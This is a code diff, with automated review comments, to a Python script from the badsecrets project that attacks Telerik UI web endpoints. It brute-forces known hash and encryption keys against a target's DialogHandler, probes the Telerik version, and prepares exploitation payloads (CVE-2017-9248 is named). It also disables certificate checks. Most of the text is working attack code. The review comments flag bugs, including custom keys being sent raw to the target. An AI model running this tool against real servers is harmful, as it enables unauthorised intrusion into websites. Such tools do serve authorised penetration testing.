diff --git a/badsecrets/examples/telerik_knownkey.py b/badsecrets/examples/telerik_knownkey.py index 4f10e786..969703e2 100755 --- a/badsecrets/examples/telerik_knownkey.py +++ b/badsecrets/examples/telerik_knownkey.py @@ -138,34 +138,55 @@ def validate_url( ] telerik_versions_patched = [ - "2022.3.1109", - "2022.3.913", - "2022.2.622", - "2022.2.511", - "2022.1.302", - "2022.1.119", - "2021.3.1111", - "2021.3.914", - "2021.2.616", - "2021.2.511", - "2021.1.330", - "2021.1.224", - "2021.1.119", - "2020.3.1021", - "2020.3.915", - "2020.2.617", - "2020.2.512", - "2020.1.219", - "2020.1.114", - "2019.3.1023", - "2019.3.917", - "2019.2.514", - "2019.1.215", - "2019.1.115", - "2018.3.910", - "2018.2.710", - "2018.2.516", "2018.1.117", + "2018.2.516", + "2018.2.710", + "2018.3.910", + "2019.1.115", + "2019.1.215", + "2019.2.514", + "2019.3.917", + "2019.3.1023", + "2020.1.114", + "2020.1.219", + "2020.2.512", + "2020.2.617", + "2020.3.915", + "2020.3.1021", + "2021.1.119", + "2021.1.224", + "2021.1.330", + "2021.2.511", + "2021.2.616", + "2021.3.914", + "2021.3.1111", + "2022.1.119", + "2022.1.302", + "2022.2.511", + "2022.2.622", + "2022.3.913", + "2022.3.921", + "2022.3.1109", + "2023.1.117", + "2023.1.314", + "2023.1.323", + "2023.1.425", + "2023.2.606", + "2023.2.718", + "2023.2.829", + "2023.3.1010", + "2023.3.1114", + "2024.1.130", + "2024.1.312", + "2024.1.319", + "2024.2.513", + "2024.2.514", + "2024.3.806", + "2024.3.924", + "2024.3.1015", + "2024.4.1112", + "2024.4.1113", + "2024.4.1114", ] 
@@ -272,19 +293,46 @@ def select_derive_algos(version): def solve_key(self): reported_early_indicator = False - for telerik_version in chain(telerik_versions, telerik_versions_patched): - print(telerik_version) - hashkeys = ( - ["dummyvalue"] - if int(telerik_version[:4]) < 2017 - else self.telerik_hashkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool) - ) + # If a specific version was provided via command line, only test that version + if hasattr(self, "version") and self.version: + versions_to_test = [self.version] + else: + versions_to_test = chain(telerik_versions, telerik_versions_patched) + + for telerik_version in versions_to_test: + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Testing Telerik version: {telerik_version}") + else: + print(telerik_version) + + # If custom keys are provided, use only those + if hasattr(self.telerik_hashkey, "custom_keys"): + hashkeys = ["dummyvalue"] if int(telerik_version[:4]) < 2017 else [self.telerik_hashkey.custom_keys[1]] + else: + hashkeys = ( + ["dummyvalue"] + if int(telerik_version[:4]) < 2017 + else self.telerik_hashkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool) + ) + for hashkey in hashkeys: - for key in self.telerik_encryptionkey.prepare_keylist( - include_machinekeys=self.include_machinekeys_bool - ): + # If custom keys are provided, use only those + if hasattr(self.telerik_encryptionkey, "custom_keys"): + keys_to_try = [self.telerik_encryptionkey.custom_keys[0]] + else: + keys_to_try = self.telerik_encryptionkey.prepare_keylist( + include_machinekeys=self.include_machinekeys_bool + ) + + for key in keys_to_try: derive_algos = self.select_derive_algos(telerik_version) for derive_algo in derive_algos: + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Testing combination:") + print(f" - Version: {telerik_version}") + print(f" - Hash Key: {hashkey}") + print(f" - Encryption Key: {key}") + print(f" - Derive Algorithm: {derive_algo}") if 
derive_algo == "PBKDF1_MS": derived_key, iv = self.telerik_encryptionkey.telerik_derivekeys_PBKDF1_MS(key) elif derive_algo == "PBKDF2": @@ -299,7 +347,11 @@ def solve_key(self): f"multipart/form-data; boundary=---------------------------{multipart_boundary}" ) request.headers.update(self.headers) + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Sending request to: {self.url}") resp = session.send(request, verify=False) + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Response status: {resp.status_code}") if "Could not load file or assembly" in resp.text: if reported_early_indicator == False: print( @@ -319,7 +371,7 @@ def solve_key(self): class DialogHandler: - def __init__(self, url, include_machinekeys_bool=False, proxies={}, headers=None): + def __init__(self, url, modern_dialog_params=False, include_machinekeys_bool=False, proxies={}, headers=None): self.url = url self.telerik_hashkey = Telerik_HashKey() self.telerik_encryptionkey = Telerik_EncryptionKey() 
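Review bot: The `hasattr(self, "debug") and self.debug` and `hasattr(self, "version") and self.version` guards in solve_key exist only because main() attaches `debug`, `version` and `custom_keys` to the object after it is constructed, so a caller that builds the class directly gets different behaviour depending on which attributes happen to be set. Setting the defaults in the constructor (`self.debug = False`, `self.version = None`), which lies outside this hunk, would let every guard here and in the DialogHandler hunks shrink to `if self.debug:`. In the custom-keys branch, `custom_keys[1]` and `custom_keys[0]` rely on the reader remembering that the tuple is (encryption key, hash key); a short comment or two named attributes would make that explicit. `print(f"[DEBUG] Testing combination:")` has no placeholders and does not need the `f` prefix.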
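Review bot: `modern_dialog_params` is inserted as the second positional parameter of `DialogHandler.__init__`, ahead of `include_machinekeys_bool`, so an existing caller written as `DialogHandler(url, True)` now enables the modern parameter format instead of MachineKeys inclusion, without any error. Appending it as keyword-only keeps old call sites working: `def __init__(self, url, include_machinekeys_bool=False, proxies={}, headers=None, *, modern_dialog_params=False):`. The call in main() shown later in this diff already passes everything by keyword, so it would be unaffected.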
@@ -330,30 +382,82 @@ def __init__(self, url, include_machinekeys_bool=False, proxies={}, headers=None self.proxies = proxies self.headers = headers self.include_machinekeys_bool = include_machinekeys_bool + self.modern_dialog_params = modern_dialog_params + + def probe_version_baseline(self): + # Get baseline with bogus version + b64section_plain = f"Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version=9999.9.999, Culture=neutral, PublicKeyToken=121fae78165ba3d4" + b64section = base64.b64encode(b64section_plain.encode()).decode() + + if hasattr(self, "modern_dialog_params") and self.modern_dialog_params: + plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;StyleManagerProperties,False,0,;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,5000000;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ScriptManagerProperties,False,0,CkZhbHNlCgoKRmFsc2UKMAoKCgo=;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,True" + else: + plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,False" + + derivedKey, derivedIV = self.telerik_encryptionkey.telerik_derivekeys( + 
self.encryption_key, self.key_derive_mode + ) + ct = self.telerik_encryptionkey.telerik_encrypt(derivedKey, derivedIV, plaintext) + dialog_parameters = self.telerik_hashkey.sign_enc_dialog_params(self.hash_key, ct) + r = requests.post( + self.url, + data={"dialogParametersHolder": dialog_parameters}, + headers=self.headers, + verify=False, + proxies=self.proxies, + ) + return len(r.text) + + def probe_version(self, version, baseline_size=None): + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Probing version: {version}") - def probe_version(self, version): b64section_plain = f"Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version={version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4" b64section = base64.b64encode(b64section_plain.encode()).decode() - plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,False" + + if hasattr(self, "modern_dialog_params") and self.modern_dialog_params: + plaintext = 
f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;StyleManagerProperties,False,0,;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,5000000;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ScriptManagerProperties,False,0,CkZhbHNlCgoKRmFsc2UKMAoKCgo=;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,True" + else: + plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,False" + derivedKey, derivedIV = self.telerik_encryptionkey.telerik_derivekeys( self.encryption_key, self.key_derive_mode ) ct = self.telerik_encryptionkey.telerik_encrypt(derivedKey, derivedIV, plaintext) dialog_parameters = self.telerik_hashkey.sign_enc_dialog_params(self.hash_key, ct) - dialog_parameters_data = {"dialogParametersHolder": dialog_parameters} r = requests.post( - self.url, data=dialog_parameters_data, headers=self.headers, verify=False, proxies=self.proxies + self.url, + data={"dialogParametersHolder": dialog_parameters}, + headers=self.headers, + verify=False, + proxies=self.proxies, ) - if r.status_code != 500: - print(version) - if r.status_code == 200: + + # Extract title if it exists + title = "" + if r.text: + 
title_match = re.search(r"([^<]+)", r.text, re.IGNORECASE) + if title_match: + title = f" {title_match.group(1).strip()}" + + if hasattr(self, "debug") and self.debug: + print( + f"Attempting to probe version: {version}. Got response code [{r.status_code}] with size {len(r.text)} {title}" + ) + if baseline_size and abs(len(r.text) - baseline_size) > 10: return dialog_parameters + return None def detect_derive_function(self): self.key_derive_mode = "PBKDF1_MS" KDF_probe_data = {"dialogParametersHolder": "AAAA"} + if hasattr(self, "debug") and self.debug: + print("\n[DEBUG] Detecting key derivation function") + print(f"[DEBUG] Sending probe request to: {self.url}") res = requests.post(self.url, data=KDF_probe_data, proxies=self.proxies, headers=self.headers, verify=False) resp_body = res.text + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Response status: {res.status_code}") if ( "Exception of type 'System.Exception' was thrown" in resp_body 
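Review bot: `probe_version` now reports a match only through `if baseline_size and abs(len(r.text) - baseline_size) > 10`, so a call that omits the new `baseline_size` argument (its default is `None`), or a baseline response with an empty body, can never return `dialog_parameters`; the previous `r.status_code == 200` check is gone with no fallback. Keeping the old criterion for that case, e.g. `if baseline_size is None: return dialog_parameters if r.status_code == 200 else None`, preserves behaviour for existing callers. The threshold `10` is an unexplained literal that is repeated in the PBKDF2 branch of solve_key in a later hunk; a named module constant with a comment on how it was chosen would keep the two in step. The long `plaintext` templates are duplicated between `probe_version_baseline` and `probe_version`, differing only in the version string, so one helper taking the version would cut the four copies to two.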
@@ -377,40 +481,64 @@ def detect_derive_function(self): print("Target is a valid DialogHandler endpoint. Brute forcing Telerik Hash Key...") def solve_key(self): + print("\n=== KEY DISCOVERY ===") # PBKDF1_MS MODE if self.key_derive_mode == "PBKDF1_MS": hashkey_counter = 0 - for hash_key_probe, hash_key in self.telerik_hashkey.hashkey_probe_generator( - include_machinekeys=self.include_machinekeys_bool - ): + # If custom keys are provided, use only those + if hasattr(self.telerik_hashkey, "custom_keys"): + hashkey_generator = [(self.telerik_hashkey.custom_keys[1], self.telerik_hashkey.custom_keys[1])] + else: + hashkey_generator = self.telerik_hashkey.hashkey_probe_generator( + include_machinekeys=self.include_machinekeys_bool + ) + + for hash_key_probe, hash_key in hashkey_generator: hashkey_counter += 1 data = {"dialogParametersHolder": hash_key_probe} res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False) + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Testing hash key #{hashkey_counter}: {hash_key}") + print(f"[DEBUG] Sending request to: {self.url}") + resp_body = urllib.parse.unquote(res.text) + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Response status: {res.status_code}") print(f"Tested {hashkey_counter} hash keys so far...") if hashkey_counter % 1000 == 0 else None if "The input data is not a complete block" in resp_body: - print(f"Found matching hashkey! [{hash_key}]") - + print(f"\nSUCCESS! 
Found matching hashkey: [{hash_key}]") self.hash_key = hash_key break elif "The input is not a valid Base-64 string" in resp_body: - print("The target appears to be a pre-2017 version, and does not have a hash key.") - print("This means it should be vulnerable to CVE-2017-9248!!!") + print("\nTarget appears to be a pre-2017 version without hash key (CVE-2017-9248)") return if self.hash_key: - print("Since we found a valid hash key, we can check for known Telerik Encryption Keys") + print("\nNow checking for known Telerik Encryption Keys...") encryptionkey_counter = 0 - for encryption_key_probe, encryption_key in self.telerik_encryptionkey.encryptionkey_probe_generator( - hash_key, self.key_derive_mode, include_machinekeys=self.include_machinekeys_bool - ): + # If custom keys are provided, use only those + if hasattr(self.telerik_encryptionkey, "custom_keys"): + encryptionkey_generator = [ + (self.telerik_encryptionkey.custom_keys[0], self.telerik_encryptionkey.custom_keys[0]) + ] + else: + encryptionkey_generator = self.telerik_encryptionkey.encryptionkey_probe_generator( + hash_key, self.key_derive_mode, include_machinekeys=self.include_machinekeys_bool + ) + + for encryption_key_probe, encryption_key in encryptionkey_generator: encryptionkey_counter += 1 data = {"dialogParametersHolder": encryption_key_probe} + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Testing encryption key #{encryptionkey_counter}: {encryption_key}") + print(f"[DEBUG] Sending request to: {self.url}") res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False) + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Response status: {res.status_code}") ( print(f"Tested {encryptionkey_counter} encryption keys so far...") 
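Review bot: In the custom-keys branches of the PBKDF1_MS path, the lists `[(custom_keys[1], custom_keys[1])]` and `[(custom_keys[0], custom_keys[0])]` put the raw key in the probe slot of the tuple, and the loop then posts that slot as `dialogParametersHolder`. The supplied key is therefore transmitted to the target as the request body (with `verify=False`, and through any configured proxy) rather than being used to build a probe, and the response strings the loop looks for are unlikely to appear, so a correct custom key would presumably be reported as not found. The probe should be produced the same way `hashkey_probe_generator` and `encryptionkey_probe_generator` produce it for a single key; their implementation is outside this diff, so the exact call needs confirming. In the hash-key loop the `[DEBUG] Sending request to` line is printed after `requests.post` has already returned. solve_key continues past the end of this hunk.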
@@ -419,75 +547,140 @@ def solve_key(self): ) if "Index was outside the bounds of the array" in res.text: - print(f"Found Encryption key! [{encryption_key}]") + print(f"\nSUCCESS! Found encryption key: [{encryption_key}]") self.encryption_key = encryption_key break if self.encryption_key == None: - print("Could not identify encryption key.") + print("\nFAILED: Could not identify encryption key.") return else: - print("Could not identify hash key.") + print("\nFAILED: Could not identify hash key.") return elif self.key_derive_mode == "PBKDF2": if self.include_machinekeys_bool: print( - "Warning: MachineKeys inclusion mode is enabled, which affects this Telerik version particularly dramatically. Brute Forcing will be VERY SLOW" + "\nWARNING: MachineKeys inclusion mode is enabled, which affects this Telerik version particularly dramatically. Brute Forcing will be VERY SLOW" ) print("Try without the MachineKeys first!") - print("About to bruteforce hash key and encryption key combinations...") + print("\nBrute forcing hash key and encryption key combinations...") + + # Get baseline response first + plaintext = "EnableAsyncUpload,False,3,True;AllowMultipleSelection,False,3,False" + derivedKey, derivedIV = self.telerik_encryptionkey.telerik_derivekeys("dummy", self.key_derive_mode) + ct = self.telerik_encryptionkey.telerik_encrypt(derivedKey, derivedIV, plaintext) + dialog_parameters = self.telerik_hashkey.sign_enc_dialog_params("dummy", ct) + data = {"dialogParametersHolder": dialog_parameters} + baseline_res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False) + baseline_size = len(baseline_res.text) + baseline_status = baseline_res.status_code + + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Baseline response size: {baseline_size} bytes") + print(f"[DEBUG] Baseline status code: {baseline_status}") + count = 0 - for hash_key in 
self.telerik_hashkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool): - for encryption_key_probe, encryption_key in self.telerik_encryptionkey.encryptionkey_probe_generator( - hash_key, self.key_derive_mode, include_machinekeys=self.include_machinekeys_bool - ): + + # If custom keys are provided, use only those + if hasattr(self.telerik_hashkey, "custom_keys"): + hashkeys = [self.telerik_hashkey.custom_keys[1]] + else: + hashkeys = self.telerik_hashkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool) + + for hash_key in hashkeys: + # If custom keys are provided, use only those + if hasattr(self.telerik_encryptionkey, "custom_keys"): + encryptionkey_generator = [ + (self.telerik_encryptionkey.custom_keys[0], self.telerik_encryptionkey.custom_keys[0]) + ] + else: + encryptionkey_generator = self.telerik_encryptionkey.encryptionkey_probe_generator( + hash_key, self.key_derive_mode, include_machinekeys=self.include_machinekeys_bool + ) + + for encryption_key_probe, encryption_key in encryptionkey_generator: count += 1 - data = {"dialogParametersHolder": encryption_key_probe} + # For PBKDF2, we need to properly encrypt and hash the parameters + derivedKey, derivedIV = self.telerik_encryptionkey.telerik_derivekeys( + encryption_key, self.key_derive_mode + ) + + # Use a simple dummy payload for key discovery + plaintext = "EnableAsyncUpload,False,3,True;AllowMultipleSelection,False,3,False" + + ct = self.telerik_encryptionkey.telerik_encrypt(derivedKey, derivedIV, plaintext) + dialog_parameters = self.telerik_hashkey.sign_enc_dialog_params(hash_key, ct) + data = {"dialogParametersHolder": dialog_parameters} + if hasattr(self, "debug") and self.debug: + print(f"\n[DEBUG] Testing combination #{count}:") + print(f" - Hash Key: {hash_key}") + print(f" - Encryption Key: {encryption_key}") + print(f"[DEBUG] Sending request to: {self.url}") res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False) - if 
"Index was outside the bounds of the array" in res.text: - print(f"Found Encryption key! [{encryption_key}]") - print(f"Found matching hashkey! [{hash_key}]") + # Extract title if it exists + title = "" + if res.text: + title_match = re.search(r"([^<]+)", res.text, re.IGNORECASE) + if title_match: + title = f" {title_match.group(1).strip()}" + + response_size = len(res.text) + size_diff = abs(response_size - baseline_size) + if hasattr(self, "debug") and self.debug: + print(f"[DEBUG] Response: [{res.status_code}]{title}") + print(f"[DEBUG] Response size: {response_size} bytes (diff: {size_diff} bytes)") + + # Detect significant change from baseline (more than 10 bytes different) + if size_diff > 10: + print(f"\nSUCCESS! Found encryption key: [{encryption_key}]") + print(f"SUCCESS! Found matching hashkey: [{hash_key}]") self.encryption_key = encryption_key self.hash_key = hash_key - break + return True - ( - print(f"Tested {count} hash key / encryption key combinations so far...") - if count % 1000 == 0 - else None - ) - - if self.hash_key: - break + (print(f"Tested {count} combinations so far...") if count % 1000 == 0 else None) if self.hash_key and self.encryption_key: + print("\nSuccessfully found both keys!") return True else: - print("Did not find hashkey / encryption key. Exiting.") + print("\nFAILED: Did not find hashkey / encryption key. Exiting.") + return False def solve_version(self): - print( - "Both encryption key and hash key were found: attempting to brute-force Telerik UI version and generate exploitation payload" - ) + print("\n=== VERSION PROBING ===") + print("Keys found! 
Now attempting to find the exact Telerik UI version...") + + baseline_size = self.probe_version_baseline() versions = [] - for v in telerik_versions + telerik_versions_patched: - versions.append(v) - undotted_versions = [] - for v in telerik_versions: - undotted_versions.append(re.sub(r"\.(?=\d+$)", "", v)) - versions += undotted_versions + # If version specified, only test that version + if hasattr(self, "version") and self.version: + versions = [self.version] + else: + # Otherwise test all versions + for v in telerik_versions + telerik_versions_patched: + versions.append(v) + undotted_versions = [] + for v in telerik_versions: + undotted_versions.append(re.sub(r"\.(?=\d+$)", "", v)) + versions += undotted_versions for version in versions: - dialog_parameters = self.probe_version(version) + dialog_parameters = self.probe_version(version, baseline_size) if dialog_parameters: self.version = version self.dialog_parameters = dialog_parameters + print(f"\nSUCCESS! Found working version: {version}") return True + print("\nFAILED: Could not find a working version despite having valid keys.") + print("This might indicate the target is using a custom/unknown version.") + return False + def main(): parser = argparse.ArgumentParser() 
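Review bot: The PBKDF2 branch takes its baseline from a request signed with the hash key `"dummy"` and treats any response more than 10 characters different as proof that both keys are right. If the server answers differently once the signature verifies but decryption still fails (the PBKDF1_MS branch relies on exactly such distinct error messages), the first encryption key tried under the correct hash key would be reported as found; this is inferred from the visible code, not tested. The removed check on `"Index was outside the bounds of the array"` was specific to one outcome, and keeping a content check alongside the size comparison, or re-baselining once the response first changes, would avoid recording a wrong pair in `self.encryption_key` and `self.hash_key`. `baseline_status` is collected but only printed in debug mode, and `encryption_key_probe` from the generator is no longer used, so iterating `self.telerik_encryptionkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool)` directly would avoid building probes that are then discarded.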
@@ -521,19 +714,50 @@ def main(): help="Force enumeration of vulnerable AsyncUpload endpoint without user confirmation", action="store_true", ) + + parser.add_argument( + "-v", + "--version", + help="Specify a custom Telerik version to test", + ) + + parser.add_argument( + "-c", + "--custom-keys", + help="Specify custom keys in format 'encryptionkey,hashkey'. When provided, only these keys will be tested.", + ) + + parser.add_argument( + "-d", "--debug", help="Enable debug mode to show detailed request information", action="store_true" + ) + + parser.add_argument( + "--modern-dialog-params", + help="Use modern dialog parameters format (for newer Telerik versions 2018+)", + action="store_true", + ) + args = parser.parse_args() if not args.url: return + if args.debug: + print("\n=== DEBUG MODE ENABLED ===") + print("Will show detailed information about each request and key combination being tested") + print("This will generate a lot of output!\n") + + if args.proxy: + proxies = {"http": args.proxy, "https": args.proxy} + else: + proxies = {} + include_machinekeys_bool = False if args.machine_keys: include_machinekeys_bool = True print("MachineKeys inclusion enabled. Bruteforcing will take SIGNIFICANTLY longer") - proxies = None - if args.proxy: - proxies = {"http": args.proxy, "https": args.proxy} + # If version specified, only test that version headers = {} if args.user_agent: 
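Review bot: The value of `--version` is stored unvalidated and later reaches `int(telerik_version[:4])` in solve_key and the `Version={version}` assembly string in probe_version, so a typo such as `v2019.3.1023` ends in an uncaught ValueError traceback rather than a usage message. Checking it right after `parse_args()` would fail early, for example `if args.version and not re.fullmatch(r"\d{4}(\.\d+)+", args.version): parser.error("--version must look like 2019.3.1023")`, with the pattern adjusted to whatever formats `telerik_versions` contains. The comment `# If version specified, only test that version` is left in main() with no code under it and should be removed or moved to where `rau.version` is assigned. The change of the no-proxy default from `None` to `{}` deserves a one-line comment if it is intentional.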
@@ -564,12 +788,26 @@ def main(): headers=headers, include_machinekeys_bool=include_machinekeys_bool, ) + if args.custom_keys: + try: + encryption_key, hash_key = args.custom_keys.split(",") + rau.telerik_encryptionkey.custom_keys = (encryption_key, hash_key) + rau.telerik_hashkey.custom_keys = (encryption_key, hash_key) + print(f"Using custom keys - Encryption Key: {encryption_key}, Hash Key: {hash_key}") + print("Only testing provided custom keys...") + except ValueError: + print("Error: Custom keys must be provided in format 'encryptionkey,hashkey'") + return rau.version_probe() if not args.force: response = input("Ready to attempt brute-force, press enter to continue...") if response.lower() != "": print("aborting...") sys.exit(2) + if args.version: + print(f"Testing specified version: {args.version}") + rau.version = args.version + rau.debug = args.debug rau.solve_key() return @@ -588,9 +826,28 @@ def main(): print(f"Confirmed target is Telerik UI DialogHandler") dh = DialogHandler( - args.url, proxies=proxies, headers=headers, include_machinekeys_bool=include_machinekeys_bool + args.url, + modern_dialog_params=args.modern_dialog_params, + proxies=proxies, + headers=headers, + include_machinekeys_bool=include_machinekeys_bool, ) + if args.custom_keys: + try: + encryption_key, hash_key = args.custom_keys.split(",") + dh.telerik_encryptionkey.custom_keys = (encryption_key, hash_key) + dh.telerik_hashkey.custom_keys = (encryption_key, hash_key) + print(f"Using custom keys - Encryption Key: {encryption_key}, Hash Key: {hash_key}") + print("Only testing provided custom keys...") + except ValueError: + print("Error: Custom keys must be provided in format 'encryptionkey,hashkey'") + return + dh.debug = args.debug + dh.modern_dialog_params = args.modern_dialog_params dh.detect_derive_function() + if args.version: + print(f"Testing specified version: {args.version}") + dh.version = args.version if dh.solve_key(): print("solved key!") if dh.solve_version(): 
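Review bot: The custom-keys parsing block is repeated verbatim for `rau` here and for `dh` in the next hunk, and in both places the same `(encryption_key, hash_key)` tuple is attached to both helper objects, which is why the consumers have to index `[0]` on one and `[1]` on the other. A small helper that splits the argument once and returns the pair, called before either branch, would remove the duplication and give one place to report a malformed value. The keys are also echoed to stdout by `print(f"Using custom keys - ...")`; when they are an organisation's real machine keys rather than published defaults, that puts them into terminal scrollback and any captured logs, so printing only a truncated form would be safer. `rau.debug` and `rau.version` are assigned only after `rau.version_probe()` has run, so that call cannot honour the debug flag.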
diff --git a/tests/examples_telerik_knownkey_test.py b/tests/examples_telerik_knownkey_test.py index e1b1ed08..52f3a135 100644 --- a/tests/examples_telerik_knownkey_test.py +++ b/tests/examples_telerik_knownkey_test.py @@ -103,7 +103,7 @@ def asyncupload_found_key_matcher_PBKDF1_MS_incorrect(request): def PBKDF2_found_key_matcher(request): if ( request.body - == "dialogParametersHolder=Ct3E%2FAXZ0ct05hNqzzSbCRVxte%2F%2BQBIVbVz21p21CqLSnQsGfzTjsiq%2FxoAQaaDuaafBKu8cNXMOGT5kJcE0snNDBVbQqvbQLEYa1cWQYr%2FL2tOMq8Rnuzq6F7HKpN2%2BP0tdCPxrO3s6K2W43kvEO5wyaDlijlF9r2XI6UL1FUk%3D" + == "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rFGZylxNlfmCxZEQFLAyV2xh%2FkGVb%2Bk95TQYnppybCMfuwinH7NDbVXKO7qr3kTNUCkgUUdFGWw6%2BoM49hkD%2BwQN%2F62S%2F%2BfVkxGJeRQEKHakLELFYpjwgW6UsXXDGmQilTdKx4iZ1MlO3JsD%2FWMUF94bACEiq26YUKhW7j0MEChv4regUuWBhAvrq0WKEdRbk%3D" ): return True return False @@ -112,7 +112,7 @@ def PBKDF2_found_key_matcher(request): def PBKDF2_found_key_matcher_negative(request): if ( request.body - == "dialogParametersHolder=Ct3E%2FAXZ0ct05hNqzzSbCRVxte%2F%2BQBIVbVz21p21CqLSnQsGfzTjsiq%2FxoAQaaDuaafBKu8cNXMOGT5kJcE0snNDBVbQqvbQLEYa1cWQYr%2FL2tOMq8Rnuzq6F7HKpN2%2BP0tdCPxrO3s6K2W43kvEO5wyaDlijlF9r2XI6UL1FUk%3D" + == "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rFGZylxNlfmCxZEQFLAyV2xh%2FkGVb%2Bk95TQYnppybCMfuwinH7NDbVXKO7qr3kTNUCkgUUdFGWw6%2BoM49hkD%2BwQN%2F62S%2F%2BfVkxGJeRQEKHakLELFYpjwgW6UsXXDGmQilTdKx4iZ1MlO3JsD%2FWMUF94bACEiq26YUKhW7j0MEChv4regUuWBhAvrq0WKEdRbk%3D" ): return False return True 
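Review bot: The replacement body in `PBKDF2_found_key_matcher` is an opaque URL-encoded blob with nothing recording which hash key, encryption key and plaintext produce it, and the identical literal is pasted again into `PBKDF2_found_key_matcher_negative` in the next hunk. Hoisting it into one module-level constant with a comment, e.g. `PBKDF2_FOUND_KEY_BODY = "dialogParametersHolder=..."  # dummy key-discovery payload from DialogHandler.solve_key, signed and encrypted with the test key pair`, would let the next payload change be made in one place and regenerated rather than copied. That the blob corresponds to the new dummy payload is an assumption from the timing of this change and should be confirmed when writing the comment.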
